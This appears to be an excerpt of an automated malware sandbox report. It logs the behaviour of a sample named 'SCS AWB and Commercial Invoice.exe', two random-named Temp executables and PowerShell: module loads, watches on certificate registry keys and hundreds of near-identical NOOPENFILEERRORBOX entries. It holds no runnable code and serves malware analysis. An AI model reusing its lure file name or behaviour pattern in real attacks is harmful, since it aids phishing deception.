Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
